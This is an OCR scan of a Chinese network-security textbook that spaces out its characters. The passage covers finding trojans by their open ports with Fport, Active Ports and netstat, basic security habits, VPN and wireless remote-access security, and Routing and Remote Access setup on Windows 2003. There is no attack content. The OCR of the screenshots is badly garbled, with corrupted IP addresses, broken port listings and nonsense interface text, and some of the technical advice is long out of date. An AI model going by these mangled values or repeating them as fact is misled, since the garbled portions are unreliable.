如 果 看 到 7626 端口 已 经 开放 ,并 且 正 在 监听 等 待 连接 ,出 现 这 种 情况 极 有 可 能 是 

了 “冰河 ”病毒 。 需 要 断 开 网 络 , 用 抗 病毒 软件 查 杀 相关 病毒 。 


2. 工作 在 Windows 2000 操作 系统 下 的 命令 行 工具 Fport 

使 用 Windows 2000 操作 系统 的 用 户 要 比 使 用 Windows 9x 操作 系统 的 幸运 一 些 , 因 为 
使 用 Fport 这 个 程序 来 显示 本 机 开放 端口 与 进程 的 对 应 关系 。 

Fport 是 Found Stone 公司 出 品 的 一 个 用 来 列 出 系统 中 所 有 打开 的 TCP/IP 和 UDP 端 
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口 ,以 及 它们 对 应 应 用 程序 的 完整 路 径 .PID 标志 、 进 程 名 称 等 信息 的 软件 。 在 DOS 命令 行 
下 使 用 ,请 看 例子 。 
D:\>fport. exe 
FPort v1.33 — TCP/IP Process to Port Mapper 
Copyright 2000 by Foundstone, Inc. 
http: //www. foundstone. com 
Pid Process Port Proto Path 
748 tcpsvcs —>7 TCP C:\WINNT\System32\ tcpsvcs. exe 
748 tcpsvcs —>9 TCP C:\WINNT\System32\tcpsvcs. exe 
748 tcpsvcs —>19 TCP C:\WINNT\System32\tcpsvcs. exe 
416 svchost —>135 TCP C:\WINNT\system32\svchost. exe 


如 果 发 现 有 某 个 可 疑 程序 打开 了 某 个 可 疑 端口 ,也 许 那 就 是 木马 程序 。 
Fport 的 最 新 版 本 是 2.0。 很 多 网 站 都 提供 下 载 ,但 是 为 了 安全 起 见 ,当然 最 好 还 是 到 
http://www. foundstone. com/knowledge/zips/fport. zip 站 点 去 下 载 。 


3. Active Ports 


Active Ports 是 SmartLine 公司 出 品 的 软件 ,用 户 可 以 用 它 来 监视 计算 机 所 有 打开 的 
TCP/IP/UDP 端口 ,不 但 可 以 将 所 有 的 端口 显示 出 来 ,还 可 以 显示 所 有 端口 所 对 应 的 程序 
所 在 的 路 径 , 本 地 IP 和 远 端 IP( 试 图 连接 用 户 的 计算 机 IP) 是 否 正在 活动 。 

同时 Active Ports 还 提供 了 一 个 关闭 端口 的 功能 ,在 用 户 发 现 木 马 程序 开放 的 端口 时 ， 
可 以 立即 将 这 个 端口 关闭 。 这 个 软件 在 Windows NT/2000/XP 平 台 下 工作 。 用 户 可 以 到 
http://www. smartline. ru/software/aports. zip 站 点 下 载 。 程 序 运 行 界面 如 图 5. 3 所 示 。 


可 
Ele Qptions 2 
Process Ps LocallP Local Port RemotelP| Remote Port 
Vor System 4 17217.11.11 138 
or System 4 17217.11.11 137 
aoF System 4 0000 445 
ToP System 4 17217.11.11 139 
Tor System 4 0000 445 
oF lsass. ene 848 0000 4500 
op lsass. Exe 848 0000 500 
ToP lsass.exe 848 0000 1025 
ToP sychost exe 904 0000 80 
Tor sychost exe 1140 0000 135 
Vor sychost eye 1196 0000 1026 
SoF Svchost exe 1256 17217.11.11 123 
"Tor IEE 1288 1721711.11 1044 210.192.114.154 80 
Vor sqlservr.exe 1932 0000 1434 
To sqlservi.exe 1932 0000 1433 
Tor msmdstv.exe 2036 0000 2725 
Tor msmdstv.exe 2036 0000 2394 
ToP msmdsty.exe 2036 0000 2393 
To alg ene 2704 127.001 1029 
4 可 
Temmaie Process Query Names xX Ea 


图 5.3 Active Ports 程序 界面 
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使 用 Windows XP 操作 系统 的 用 户 无 须 借助 其 他 软件 即 可 以 得 到 端口 与 进程 的 对 应 关 
系 , 因 为 Windows XP 所 带 的 Netstat 命令 比 早期 的 版 本 多 了 一 个 o 参数 ,使 用 这 个 参数 就 
可 以 得 到 端口 与 进程 的 对 应 关系 。 

对 木马 程序 重点 在 于 防范 ,而 且 如 果 磁 上 反弹 端口 木马 程序 、 利 用 驱动 程序 及 动态 链接 
库 技 术 制 作 的 新 木马 程序 时 ,使 用 本 节 所 介绍 的 这 些 方法 就 很 难 查 出 木马 程序 的 痕迹 。 


5.7 计算 机 日 常 使 用 的 安全 建议 


@ 建立 良好 的 安全 习惯 。 例 如 ,对 一 些 来 历 不 明 的 邮件 及 附件 不 要 打开 ,不 要 上 一 些 
不 太 了 解 的 网 站 ,不 要 执行 从 Internet 下 载 后 未 经 杀毒 处 理 的 软件 等 ,这 些 必要 的 习惯 会 使 
计算 机 更 安全 。 

@ 关闭 或 删除 系统 中 不 需要 的 服务 。 默 认 情 况 下 ,许多 操作 系统 会 安装 一 些 辅助 服 
务 , 如 FTP 客户 端 .Telnet 和 Web 服务 器 。 这 些 服务 为 攻击 者 提供 了 方便 ,而 又 对 用 户 没 
有 太 大 用 处 , 则 删除 它们 ,就 能 减少 被 攻击 的 可 能 性 。 

@@ 经 常 升级 安全 补丁 。 据 统计 ,有 80% 的 网 络 病毒 是 通过 系统 安全 漏洞 进行 传播 的 ， 
像 “ 红 色 代码 ”“ 尼 姆 达 ” 等 病毒 ,所 以 用 户 应 该 定期 到 操作 系统 开发 商 网 站 去 下 载 最 新 的 安 
全 补丁 ,以 防 患 未 然 。 

@ 使 用 复杂 的 密码 。 有 许多 网 络 病 毒 是 通过 猜测 简单 密码 的 方式 攻击 系统 的 ,因此 使 
用 复杂 的 密码 ,将 会 提高 计算 机 的 安全 。 

@ 迅速 隔离 受 感染 的 计算 机 。 当 发 现 计算 机 出 现 病毒 或 异常 时 应 立刻 切断 网 络 , 以 防 
止 计算 机 受到 更 多 的 感染 ,或 者 成 为 传播 源 ,感染 其 他 计算 机 。 

@ 了 解 一 些 病 毒 知识 。 这 样 就 可 以 及 时 发 现 新 病毒 并 采取 相应 措施 ,使 自己 的 计算 机 
免 受 病毒 攻击 : 如 果 能 了 解 一 些 注册 表 知 识 , 就 可 以 定期 看 一 看 注册 表 的 自 启动 项 是 否 有 
可 疑 键 值 ; 如 果 了 解 一 些 内 存 知识 ,就 可 以 经 常 看 看 内 存 中 是 否 有 可 疑 程 序 。 

@ 安装 专业 的 抗 病毒 软件 进行 全 面 监 控 。 使 用 抗 病 毒 软件 进行 病毒 防治 ,是 越 来 越 经 
济 的 选择 ,不 过 用 户 在 安装 了 抗 病毒 软件 之 后 ,应 该 经 常 进行 升级 ,将 一 些 主要 监控 打开 (如 
邮件 监控 ), 遇 到 问题 要 上 报 ,这 样 才能 真正 保障 计算 机 的 安全 。 


习题 


1. 病毒 的 定义 是 什么 ”可 以 按 哪 三 种 方式 对 病毒 进行 分 类 ? 

2. 什么 是 VBS 病毒 ? 

3. 什么 是 WSH? 

4. 什么 是 缓冲 区 溢出 ? 

5.〖 思 考题 ] 如 何 使 用 系统 自身 和 软件 检查 是 否 感染 了 木马 软件 ? 
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作为 企业 网 络 平台 的 一 种 有 效 延伸 ,远程 访问 接 人 技术 一 直 在 网 络 应 用 
中 扮演 着 重要 的 角色 。 通 过 远程 接 入 技术 ,用 户 可 不 受 时 间 、 地 点 的 限制 顺 
利 地 接 入 企业 内 部 网 络 平台 。 

本 章 要 点 如 下 : 

。 实现 远程 连接 的 方法 ; 

。 利 用 Windows 系统 实现 远程 连接 ; 

。 Windows 系统 实现 远程 连接 的 安全 控制 。 


6.1 常见 远程 连接 的 方法 


61.1 利用 拨号 技术 来 实现 远程 连接 


目前 最 普通 方便 的 远程 访问 方式 是 通过 传输 媒介 一 一 PSTN( 公 用 电话 
网 ) 利 用 modem( 调 制 解 调 器 ) 模 拟 拨号 技术 来 实现 远程 连接 。 利 用 PSTN 
进行 远程 接 人 ,用 户 只 需要 一 条 电话 线 和 普通 的 modem, 投 入 很 小 。 如 果 用 
户 想 同 时 获得 数据 和 模拟 的 电话 传真 服务 ,就 不 得 不 再 向 电信 部 门 申请 一 个 
新 的 号 码 ,因为 数据 和 模拟 通信 均 要 独占 一 个 隧道 ,这 是 一 种 资源 的 浪费 。 

PSTN 远程 拨号 接 人 技术 在 传输 数据 的 安全 方面 ,只 对 数据 进行 封装 并 
加 上 一 个 提供 路 由 信息 的 报头 ,通常 不 会 对 数据 进行 加 密 处 理 ,设置 时 只 要 
注意 两 台 计 算 机 使 用 的 通信 协议 是 否 相同 即 可 ,实施 过 程 容易 实现 。 

PSTN 远程 拨号 接 入 方式 存在 带宽 不 足 、 接 入 速度 慢 、 服 务 质量 差 .需要 
支付 昂贵 的 长 途 拨号 和 长 途 专线 服务 费用 等 问题 ,以 及 无 法 满足 企业 数据 传 
输 应 用 需求 。 因 此 出 现 了 一 些 新 的 接 和 人 技术 ,如 利用 电话 线 作 为 传输 介质 的 
xDSL( 任 何 数字 用 户 线 ) 依靠 有 线 电视 电缆 的 cable modem( 电 缆 调 制 解 调 
器 ) ,利用 以 太 网 的 接 入 方式 ,但 是 这 些 接 入 技术 由 于 对 传输 介质 的 依赖 性 很 
强 , 所 以 不 能 运用 于 企业 网 远程 访问 。 

随 着 网 络 的 发 展 , 拨 号 接 人 技术 已 经 成 为 xDSL 和 cable modem 方式 的 
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备用 选择 。 
612 利用 VPN 实现 远程 连接 


虚拟 专用 网 (Virtual Private Network,VPN) 是 专用 网 络 在 公共 网 络 上 的 扩展 。VPN 
利用 私有 隧道 技术 在 公共 网 络 上 仿真 一 条 点 到 点 的 专线 ,从 而 达到 安全 地 进行 数据 传输 的 
目的 。 由 于 VPN 具有 高 灵活 性 、 高 带宽 高 安全 性 、 应 用 费用 相对 低廉 等 优点 ,已 经 成 为 常 
用 的 企业 网 远程 访问 解决 方案 。 


1. 配置 VPN 的 网 络 方案 


企业 可 以 利用 现 有 的 网 络 设备 ,如 路 由 器 、 服 务 器 与 防火 墙 来 搭建 VPN 网 络 。 企 业 可 
以 选择 路 由 器 式 的 VPN 网 络 , 也 可 以 选择 防火 墙 式 的 VPN 网 络 ,根据 用 户 使 用 设备 的 侧 
重点 而 定 。 

(1) 路 由 器 式 VPN 

使 用 具有 VPN 功能 的 路 由 器 ,企业 总 部 可 与 分 公司 间 经 由 Internet 来 传输 资料 。 单 
个 用 户 也 可 以 在 ISP 网 络 中 建立 隧道 ,对 企业 内 部 网 络 进行 访问 。 路 由 器 式 VPN 部 署 较 
为 简单 ,只 要 在 路 由 器 上 添加 VPN 服务 的 相关 配置 即 可 。 新 型 路 由 器 在 软件 或 操作 系 
统 中 内 建 了 VPN 服务 ,一般 都 会 包括 防火 墙 、 加 密 以 及 隧道 (Tunneling) 等 功能 。 有 些 厂 
商 则 会 将 用 户 身份 辨识 与 既 有 的 身份 辨识 服务 ,如 远 端 身份 辨识 拨 接 用 户 服务 (Remote 
Authentication Dial-In User Service, RADIUS) 结 合 在 一 起 。 

(2) 防火 墙 式 VPN 

许多 企业 使 用 防火 墙 作 为 Internet 安全 措施 的 核心 ,而 许多 防火 墙 产 品 中 已 加 入 了 
VPN 功能 ,用 户 可 以 建立 基于 防火 墙 的 VPN 网 络 。 

这 种 作法 的 好 处 是 现 有 网 络 架构 保持 不 变 。 管 理 VPN 服务 所 用 的 接口 与 原来 管理 防 
火 墙 的 使 用 端口 通常 是 相同 的 ,因此 管理 和 维护 都 得 到 简化 。 

(3) 软件 式 VPN 

如 果 企 业 资金 有 限 ,也 可 以 采用 软件 方式 实现 VPN 网 络 , 软 件 VPN 一 样 可 以 执行 加 
密 、 隧 道 建立 与 身份 辨识 等 功能 ,实施 时 将 软件 安装 在 现 有 的 服务 器 ,无 需 改 动 网 络 结构 。 
另外 ,软件 式 VPN 可 以 与 现 有 的 网 络 操作 系统 的 身份 辨识 服务 相互 兼容 ,可 以 大 幅 简化 
VPN 网 络 的 管理 工作 。 


2. VPN 的 安全 管理 


同 其 他 网 络 一 样 ,VPN 网 络 也 必须 进行 有 效 的 管理 。 同 时 需要 注意 的 还 有 VPN 的 安 
全 问题 ,尤其 是 和 Internet 相关 的 安全 问题 。 针 对 这 一 方面 .所 有 的 VPN 设备 都 应 用 了 相 
关 的 核心 技术 ,这 些 技术 包括 隧道 协议 .资料 加 密 (Cencryption)、 认 证 Cauthentication) 及 存 
取 控 制 (access control) 等 。 

(1) 隧道 协议 

一 般 而 言 ,隧道 协议 技术 分 为 两 种 不 同 的 类 型 。 

第 一 种 类 型 是 端 对 端 (End-to-End) 隧道 技术 ,从 用 户 的 PC 机 延伸 到 用 户 所 连接 的 服 
务 器 上 。 每 个 端点 的 VPN 设备 都 必须 负责 隧道 的 建立 和 端点 之 间 资 料 加 密 及 解密 等 
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工作 。 
第 二 种 类 型 是 结 点 对 结 点 (node-to-node) 隧 道 技术 。 主 要 是 连接 不 同 地 区 的 局 域 网 。 
在 局 域 网 内 部 传输 的 数据 并 不 需 做 任何 的 变动 ; 一 旦 数据 必须 经 由 网 络 外 于 Cedge) 的 
VPN 设备 传输 到 不 同 的 局 域 网 时 ,数据 才 会 被 加 密 且 经 由 隧道 传输 给 下 一 个 结 点 的 对 应 设 
备 。 当 结 点 收 到 数据 后 ,VPN 设备 会 将 这 些 数据 解密 ,还 原 成 原来 的 格式 传输 到 内 部 局 域 
网 。 隧 道 协议 技术 也 让 VPN 得 以 维持 像 局 域 网 一 样 的 安全 性 和 优先 性 ,以 提供 传输 控制 
能 力 。 

大 部 分 的 VPN 设备 都 采用 下 面 这 些 隧道 技术 : IPSec(Internet Protocol Security, 因 特 
网 安全 协议 )、GRE (Generic Route Encapsulation, 通用 路 由 封装 )、L2TP (Layer 2 
Tunneling Protocol, 第 二 层 隧道 协议 )、L2F 及 PPTP(Pointto-Point Tunneling Protocol， 
点 对 点 隧道 协议 )。 企 业 必须 根据 实际 情况 从 VPN 设备 所 采用 的 众多 核心 技术 之 中 ,选择 
使 用 最 适合 的 技术 。 

(2) 数据 加 密 

大 部 分 的 VPN 设备 会 支持 市 场 上 主要 的 加 密 技术 , 像 RSA Security 公司 的 Rivest 
Cipher 技术 、DES 及 Triple-DES( 三 重 DES) 等 。 密 钥 长 度 的 选择 取决 于 各 种 因素 , 较 明 显 
的 因素 包括 : 确保 数据 机 密 的 重要 性 程度 以 及 数据 所 流 经 的 网 络 安全 性 等 。 

VPN 采用 加 密 技术 后 ,系统 必须 提供 给 用 户 一 套 取得 密 钥 的 方法 。 常 见 的 几 种 密 钥 管 
理 技术 为 : PPP (Point-to-Point Protocol, 点 对 点 协议 ) 中 的 ECP (Encryption Control 
Protocol, 加 密 控 制 协议 ) 协议. 具备 密 钥 管理 功能 的 MPPE (Microsoft Point-to-Point 
Encryption ,Microsoft 点 对 点 加 密 技 术 ) ,以 及 ISAKMP/IKE(Internet Society Association 
Key Management Protocol/Internet Key Exchange) 等 。 

VPN 具备 私密 性 。 加 密 应 只 用 于 特别 敏感 的 通信 , 当 有 需要 时 才 使 用 或 加 装 硬件 加 密 
模块 ,因为 加 /解密 过 程 非常 占用 处 理 器 资源 。 

(3) 认证 

VPN 采用 许多 现存 的 用 户 认 证 技术 ,如 PAP(Password Authentication Protocol, 密 码 
认证 协议 ) 技 术 、CHAP(Challenge Handshake Authentication Protocol, 挑 战 握手 验证 协 
议 ) 技 术 , 以 及 Microsoft 的 CHAP 的 支持 技术 。 

VPN 连接 中 一 般 包括 两 种 形式 的 认证 。 

Q@ 用 户 身 份 认 证 ,在 VPN 连接 建立 之 前 ,VPN 服务 器 对 请 求 建立 连接 的 VPN 客户 机 
进行 身份 验证 ,核查 其 是 否 为 合法 的 授权 用 户 。 如 果 使 用 双向 验证 ,还 需 进行 VPN 客户 机 
对 VPN 服务 器 的 身份 验证 。 

@ 数据 完整 性 和 合法 性 认证 ,检查 链 路 上 传输 的 数据 是 否 出 自 源 端 以 及 在 传输 过 程 中 
是 否 经 过 算 改 。VPN 链 路 中 传输 的 数据 包含 密码 检查 , 密 钥 只 由 发 送 者 和 接受 者 双方 
共享 。 

(4) 存 取 控制 

在 确认 用 户 身 份 之 后 ,进一步 所 需要 的 功能 就 是 针对 不 同 的 用 户 授予 不 同 的 存 取 权 限 。 
这 部 分 的 功能 也 是 认证 服务 器 拥有 的 另 一 功能 。 

许多 VPN 设备 都 结合 了 认证 服务 器 功能 ,如 RADIUSCRemote AuthenticationDial-In 
User Service, 拨 号 用 户 远 程 认 证 服务 器 ) 及 TACAS(Terminal Access Controller Access 
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System, 终 端 存 取 控 制 存 取 系 统 ) 功 能 。 用 户 必 须 接 受 身 份 认证 (Authentication) 并 通过 授 
权 程序 (Authorization ) 知道 自己 可 以 做 些 什么 ; 一 个 良好 的 系统 会 执行 账户 稽核 
(Accounting) ,以 追踪 源 端 和 确保 安全 。 验 证 ,授权 和 账户 稽核 统称 为 AAA 服务 。 


613 无 线 远程 连接 


随 着 无 线 网 络 技 术 的 成 熟 , 经 过 无 线 网 络 和 数据 采集 设备 及 监控 设备 的 有 效 结合 ,可 以 很 
方便 地 进行 远程 连接 。 目 前 ,实现 无 线 远程 连接 的 技术 有 蓝牙 无 线 接 人 技术 .IEEE 802. 11 连 
接 技术 以 及 家 庭 网 络 的 Home RF 技术 。 在 这 三 种 技术 中 ,IEEE 802. 11 比较 适 于 企业 无 
线 网 络 ,Home RF 可 应 用 于 家 庭 中 的 移动 数据 和 语音 设备 与 主机 之 间 的 通信 ,而 蓝牙 技术 
则 可 以 应 用 于 任何 可 以 使 用 无 线 技术 的 场合 。 

但 由 于 很 多 地 方 没 有 引进 无 线 网 络 ,目前 无 线 接 人 应 用 受 限 于 很 小 的 范围 内 ,还 算 不 上 
真正 意义 的 无 线 远程 接 入 。 如 果 用 户 打算 实现 无 线 远 程 接 入 ,就 需要 建立 稳定 的 网 络 链 路 ， 
通过 无 线 网 络 及 卫星 地 面 站 进行 连接 。 

企业 在 选择 无 线 接 入 时 首先 要 注意 安全 问题 。 当 企业 使 用 无 线 局 域 网 技术 , 却 没有 
采取 适当 的 安全 措施 时 ,即使 是 一 些 初级 黑客 都 有 可 能 利用 廉价 设备 对 企业 网 络 进行 
攻击 。 

无 线 网 络 最 基本 的 安全 措施 是 WEP(Wired Equivalent Privacy)。WEP 是 设计 用 来 阻 
止 窃听 者 ,防止 未 经 授权 的 无 线 接 入 。WEP 使 用 RC4 加 密 算法 ,这 种 算法 使 用 同一 组 密 钥 
(Key) 来 打 乱 以 及 重新 组 合 网 络 封 包 。 一 个 经 验 丰 富 的 黑客 能 够 在 几 个 小 时 后 ,破解 一 段 
由 RC4 算法 加 密 过 的 文字 。 用 户 应 该 避免 以 一 种 可 预测 的 方式 来 改变 密 钥 , 黑 客 破 解密 码 
的 方式 是 大 量 收集 由 同一 组 密 钥 加 密 过 的 数据 。 这 种 攻击 方式 对 40 位 或 者 128 位 的 RC4 
加 密 机 制 都 有 效 。 

基于 以 上 原因 最 新 的 无 线 接 人 标准 将 会 整合 两 项 与 认证 和 加 密 有 关 的 关键 组 件 。 在 认 
证 功能 方面 ,未 来 可 能 会 采用 IEEE 802. 1x 标准 ,这 是 一 项 将 会 被 整合 到 Windows XP 以 
及 其 他 各 种 网 络 设备 的 认证 管理 系统 通信 协议 。 采 用 这 项 标准 能 够 让 用 户 每 次 登入 网 络 都 
使 用 不 同 的 加 密 密 钥 ,而 且 这 项 标准 提供 密 钥 管理 机 制 。IEEE 802. 1x 也 支持 例如 
Kerberos 以 及 RADIUS( 拨 接 用 户 远 程 认证 服务 , Remote Authentication Dial-In User 
Service) 这 一 类 集中 式 的 认证 ,辨识 以 及 账号 管理 架构 。Microsoft、Cisco、3COM 以 及 
Enterasys 等 主要 厂商 都 支持 IEEE 802. 1x 标准 。 

在 新 的 标准 没有 出 来 之 前 ,如 果 要 确保 无 线 接 入 的 安全 最 好 使 用 如 下 几 种 安全 管理 
策略 。 


1. 使 用 动态 密 钥 管 理 


动态 安全 链 路 会 自动 生成 一 个 新 的 128 位 密 钥 ,对 每 个 网 络 用 户 和 每 次 网 络 会 话 来 
说 都 是 唯一 的 。 动 态 密 钥 管 理 比 静态 共享 密 钥 策略 提供 更 高 的 网 络 安全 性 ,帮助 用 户 从 
手工 的 输入 工作 中 解脱 出 来 。 巾 于 确保 了 每 一 个 用 户 拥有 一 个 唯一 的 且 可 以 不 断 变更 
的 密 钥 ,即使 黑客 攻破 加 密 防线 并 获取 了 网 络 的 访问 权 , 所 获取 的 密 钥 也 只 能 使 用 几 个 
小 时 。 
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2. 定期 稽核 


通过 网 络 稽核 ,可 以 找 出 所 有 未 受 管制 的 无 线 局 域 网 络 连接 器 ,进而 将 它们 纳入 系统 既 
有 的 安全 政策 体系 ,或 者 干脆 完全 停止 使 用 这 些 连 接 器 ,从 而 达到 完善 企业 网 络 安全 性 的 目 
的 。 从 目前 来 看 ,各 企业 应 该 使 用 具备 无 线 局 域 网 络 流量 侦 测 功能 的 产品 (能 够 找 出 无 线 局 
域 网 络 连接 器 ) 。 


3. 认证 
由 于 以 WEP 为 基础 的 标准 规范 存在 安全 缺陷 ,企业 应 着 眼 于 无 线 局 域 网 络 用 户 的 认 


证 机 制 ,如 拨 接 用 户 远程 认证 服务 (Remote Authentication Dial-In User Service， 
RADIUS) 。 实 现 认证 的 方法 包括 软件 认证 服务 器 、 处 于 结 点 位 置 的 硬件 防火 墙 等 。 


6.2 远程 访问 技术 和 支持 遇 到 的 问题 


由 于 远程 访问 在 整个 公司 的 关键 业务 功能 中 不 是 扮演 主要 角色 ,也 不 被 视 为 核心 IT 
服务 。 在 安装 基础 (installation base) 的 设计 、 部 署 和 支持 上 存在 差异 。 

早期 解决 方案 通常 存在 如 下 问题 。 

(1) 不 能 管理 远程 客户 端 

缺乏 建立 和 管理 远程 计算 机 标准 ,在 远程 访问 解决 方案 的 安全 结构 中 存在 巨大 缝隙 ,此 
外 还 带 来 与 客户 端 计算 机 有 关 的 许多 可 用 性 (usability) 问 题 。 

(2) 在 各 IT 部 门 中 缺乏 一 致 性 

要 想 为 企业 部 署 一 个 安全 .可 预测 的 VPN 网 络 服务 ,需要 用 户 有 一 个 统一 的 远景 规划 
和 一 个 清晰 、 一 致 的 安全 框架 。 

(3) 缺乏 详细 的 监控 、 报 警 或 衡量 标准 收集 (metrics gathering) 

网 络 管理 部 门 能 够 监控 服务 运行 状态 的 基本 情况 ,但 是 不 能 监控 端 到 端的 服务 状态 和 
符合 标准 的 情况 。 

(4) 各 厂商 产品 的 兼容 性 问题 

各 厂商 的 VPN 网 络 产品 存在 互 不 兼容 的 问题 ,使 用 不 同 厂 商 设备 的 网 络 之 间 无 法 相 
互通 信 , 如 果 用 户 想 升级 VPN 网 络 , 则 有 可 能 需要 更 新 全 部 的 VPN 网 络 设备 。 

(5) 角色 和 权限 不 清晰 

VPN 网 络 还 面临 着 角色 和 权限 不 清晰 的 问题 。 任 何 一 个 接 入 VPN 网 络 的 用 户 都 有 可 
能 具有 过 高 的 权限 ,使 得 他 可 以 在 企业 内 部 网 络 中 任意 察看 共享 资源 。 


6.3 使 用 Windows 2000 操作 系统 实现 远程 访问 服务 


远程 访问 服务 是 一 个 标准 的 C/S( 客 户 端 / 服 务 器 ) 模 式 的 服务 ,分 为 远程 访问 服务 器 和 
远程 访问 客户 端 两 部 分 。 要 实现 远程 访问 ,需要 找 一 台 计 算 机 作为 远程 访问 服务 器 ,在 
Windows 2000 家 族 产品 中 只 有 Windows 2000 Server 以 上 版 本 才 具 有 远程 访问 服务 器 的 
功能 。 
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6.3.1 Windows 2003 服务 器 端 设置 
在 Windows 2003 操作 系统 中 进行 远程 访问 服务 器 端 设置 ,需要 如 下 操作 步骤 ,选择 
“开始 ”1“ 设 置 "1“ 控 制 面板 ”1“ 管 理工 具 ”|“ 路 由 和 远程 访问 ”选项 。 打 开路 由 和 远程 访问 控 
制 台 。 
右 击 要 设置 的 服务 器 ,在 打开 的 快捷 菜单 中 选择 “配置 并 启动 路 由 和 远程 访问 ”选项 , 启 
动 路 由 和 远程 访问 服务 器 安装 向 导 。 如 果 系 统 开启 防火 墙 ,并 且 在 服务 中 启动 了 防火 墙 功 
能 , 则 系统 首先 会 提示 用 户 关闭 相应 的 服务 ,信息 提示 如 图 6. 1 所 示 。 
到 
下 和 和 
修 必 须 是 管理 员 才 能 完成 这 些 步骤 。 


图 6.1 提示 关闭 防火 墙 功能 
待 用 户 关闭 防火 墙 功 能 后 ,再 次 选择 “配置 并 启动 路 由 和 远程 访问 ”选项 , 则 弹出 设置 向 
导 界 面 ,如 图 6. 2 所 示 。 单 击 “ 下 一 步 ” 按 钮 ,进入 公共 设置 界面 。 


路 由 和 运程 访问 服务 器 安装 向 导 
欢迎 使 用 路 由 和 远程 访问 服务 器 安装 向 导 


此 向 导 帮 助 您 设置 服务 器 ,使 你 可 以 连接 到 其 它 网 络 
开交 许 来 目 远程 客户 六 的 连接 。 


要 继续 ， 请 单 击 “ 下 一 步 "”。 


取 光 
图 6.2 设置 向 导 界 面 


选择 “远程 访问 服务 器 ”选项 , 单 击 “下 一 步 ? 按 钮 ,弹出 远程 访问 服务 器 界面 ,其 中 有 两 
种 选择 ,分 别 是 “设置 一 个 基本 的 远程 访问 服务 器 ”和 “设置 一 个 高 级 远程 访问 服务 器 ”, 如 
图 6. 3 所 示 , 这 里 选择 后 一 种 , 单 击 “ 下 一 步 ” 按 钮 。 

在 管理 多 个 远程 访问 服务 器 界面 中 ,选择 “不 ,我 现在 不 想 设 置 此 服务 器 使 用 
RADIUS”, 如 图 6.4 所 示 , 单 击 “ 下 一 步 ” 按 钮 。 

在 IP 地 址 指定 界面 中 ,有 两 种 选择 :“ 使 用 自动 地 址 分 配 , 用 户 需 要 将 这 台 服 务 器 配置 
为 DHCP 代理 "和 “来 自 一 个 指定 的 地 址 范围 "。 这 里 选择 DHCP 方式 , 单 击 “ 下 一 步 ” 


洲 四 


路 由 和 运程 访问 最 务 器 安装 身 导 
运程 访问 服务 器 设置 
您 可 以 使 用 基本 配置 或 更 高 级 的 配置 未 设置 此 运程 沪 问 服务 器 。 


第 6 章 远程 访问 技 


基于 网 络 的 复杂 性 选择 一 个 配置 类 型 
四 
选择 此 选项 以 包 陵 一 个 独立 的 ,有 简化 的 管理 控制 功能 的 服务 器 。 


个 设置 一 个 高 绿 远 程 访问 服务 器 人 4) 


1 bh 或 格 


《< 上- 步 四 [下 -和 步 中 )] 到 


6.3 远程 访问 服务 器 设置 界面 


管理 多 个 运程 访问 最 务 器 
您 可 以 集中 管理 所 有 的 运程 访问 服务 器 。 


和 > 个 运 委 访问 最 务 加 提供 保 中 


您 想 设置 此 远程 访问 服务 器 使 用 一 个 现 有 的 RADIVS 服务 器 吗 ? 
不 ,要 现在 不 起 设置 于 服务 器 使 用 RADTUS @]) 
个 是 ， 我 想 使 用 一 个 RADIUS 服务 器 CD) 


国 bo 和 CS 解决 方案 作 


《上 -和 步 四 职 滑 


6.4 管理 多 个 远程 访问 服务 器 界面 


路 由 和 运程 访问 


钮 。 如 果 用 户 设置 过 系统 的 IP 地址 , 则 系统 会 提示 “要 支持 对 来 自 远 程 访问 客户 的 DHCP 
消息 的 中 继 , 必 须 使 用 DHCP 服务 器 的 IP 地址 配置 DHCP 中 断代 理 程 序 的 属性 ”“ 路 由 和 
远程 访问 ”信息 如 图 6. 5 所 示 , 单 击 “确定 ?按钮 。 


Ee 


Ee 0 re 和 和 和 下 


[Ea eal 


6.5 “路 由 和 远程 访问 ”信息 提示 
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配置 完成 后 ,路 由 和 远程 访问 的 控制 台 信 息 如 图 6.6 所 示 。 


2 路 由 和 远程 访问 
文件 人 ) ”操作 全) 查看 WD) 帮助 00 
外 | 外 | 加 | 办 加 车 | 贸 


I I 
图 6.6 配置 完成 后 的 路 由 和 远程 访问 控制 台 信息 


在 路 由 和 远程 访问 控制 台 左边 的 树 状 列表 中 , 右 击 *DHCP 中 继 代理 程序 ”, 在 弹出 的 
快捷 菜单 中 选择 “属性 ”选项 ,弹出 属性 对 话 框 “常规 ”选项 卡 ,如 图 6.7 所 示 。 在 服务 器 地 址 
中 输入 DHCP 服务 器 的 IP 地 址 , 单 击 “ 确 定 ” 按 钮 ,保存 设置 信息 。 


DHCP 中 继 代理 程序 尾 性 Ix| 


服务 器 地 址 EE); 
添加 四 ) | 
剔除 苔 ) | 


取 滑 ”| jw | 
图 6.7 设置 DHCP 服务 器 的 IP 地 址 


接 下 来 设置 远程 访问 服务 器 上 用 户 账号 的 拨 入 属性 ,以 允许 这 些 用 户 访问 远程 访问 服 
务 器 。 选 择 “ 我 的 电脑 1“ 管理 ”|“ 本 地 用 户 和 组 ”选项 . 右 击 需要 设置 的 用 户 ,在 弹出 的 快捷 
菜单 中 选择 “属性 ”选项 ,如 图 6. 8 所 示 , 在 弹出 的 用 户 属性 对 话 框 中 ,如 图 6. 9 所 示 , 选 中 
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“允许 访问 ” 单 选 按钮 ,设置 用 户 拨 入 属性 的 远程 访问 权限 。 


EEC =|Bl xl 
局 文件 四 操作 人 ) 查看 GD) 窗口 和 帮助 |=181x| 
守 沾 | 舌 | 加 |X 儿 加 | 氏 


管理 计算 机 虐 ) 的 内 置 帐 己 
用 用 于 运行 ASP_NET 辅助 进程 (as 
cy 

Deplo... This user account is used by 
供 来 宾 访问 计算 机 或 访问 域 的 内 
匿名 访问 Internet 信息 服务 的 
用 于 启动 进程 外 应 用 程序 的 Int 
This user account is used by 


这 是 一 个 帮助 和 支持 服务 的 提供 


采 开 当前 沈 反 的 原 性 页 。 | 


6.8 设置 用 户 属性 


[aeinistrstor E 性 | 
第 规 。 | 隶 展 于 | 配置 文件 | 环境 | 会话 | 
远程 控制 。 “| 终端 服务 配置 文件 投入 


6 不 回 撤 吕 ) 
个 由 呵 叫 方 设置 路 出 和 运程 访问 服务 ) G) 
个 总 是 回 拓 到 : 

厂 分 号 革 者 苹 地 址 @@ i 
应 用 前 老路 由 国 一 一 一 一 一 一 一 一 一 一 一 一 
为 此 拒 入 连接 定义 要 启用 的 路 由 。 | 


Ci ww | maw | 
图 6.9 设置 用 户 远程 访问 权限 


设置 完成 后 ,远程 的 客户 端 可 以 通过 modem 等 设备 拨号 连接 到 这 个 计算 机 并 通过 这 台 
